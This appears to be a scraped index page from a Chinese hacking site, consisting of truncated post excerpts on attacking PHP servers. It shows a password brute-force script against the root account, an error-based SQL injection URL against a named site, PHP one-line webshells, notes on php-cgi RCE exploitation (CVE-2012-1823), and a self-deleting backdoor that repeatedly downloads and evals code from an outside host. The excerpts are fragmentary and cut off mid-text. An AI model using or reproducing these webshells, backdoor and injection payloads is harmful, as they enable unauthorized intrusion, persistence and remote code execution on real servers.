<? set_time_limit(0); //脚本不超时 $ip = "localhost"; //IP $user = "root"; //用户名 $passwd = file("password.txt"); //密码字典 for($i=0; $i<count($passwd); $i++){ $pass = Str_Replace("\r\n", "", $passwd[$i]); //剔除多余的回车+换行 connect($user, $pass); flush(); } echo "扫描结...
之前想找个测试 没想到这有 可以测试下做个记录而已 http://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003 /data0/htdocs/leqi_new/app/myapp.php 或者 /**********version()**********/ 5.1.49-log http://webshell.cc/download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+coun...
PHP遍历单目录可写权限脚本 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>狗一样的男人检测文件夹权限</title> </head> <body bgcolor="#000000" text="#FFFFFF&q...
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RCE的PoC原文没有给出,不过说明的确可以远程执行代码。那么他是怎么做到的呢?我粗略想了想,可以利用的参数只有一个-d参数了,作用是给php定义一个ini的值。 那么利用它能做什么呢?我给出如下两个RCE的PoC方案: 1...
0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写 system() <?php system($_GET[‘input’]); ?> http://192.168.247.133:81/shell.php?input=dir ““”执行命令 “执行命令等价于shell_exec()函数来执行命令。 <?php echo`$_GET[input]`; ?> http://192.168.247.133:81/shell.php?input=dir 再来个更短的 <?=@`$_GET[c]`?> http://192.168.247.133:81/shell.php?c=dir 注...
PHP是一种脚本语言,它需要PHP解释器来分析运行PHP文件。当把PHP做为CGI服务Web请求时,它需要被嵌入到某种Web服务器里,最常见的是集成到Apache或IIS里,这就是说,在使用PHP前,你需要安装Apache或IIS,并且正确的配置它们和PHP集成的参数。虽然这种配置已经很规范,文档非常丰富,但我们还是经常在安装Apache和PHP集成时遇到问题,而且,有时候我们只想测试一个简单的PHP特征,不想就为此安装、启动Apache服务。 但据官方文档上说,这个内置的Web服务器只是提供开发测试使用,不推荐使用中生产环境中。因为这个服务器接受处理请求时...
webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5); }; ?> eval.txt file_put_contents('1.txt','hello world '.time()); 使用方式 将 webshel.php 传到服务器之后访问一次他会自删除。但,依然会在后台执行 eval.txt 中的代码。 停止执行 删除或清空 webshel.txt。 缺点 服务器或WEB容器一重启后门就没了。
<?php echo gethostbyname($_SERVER['HTTP_HOST']); ?>
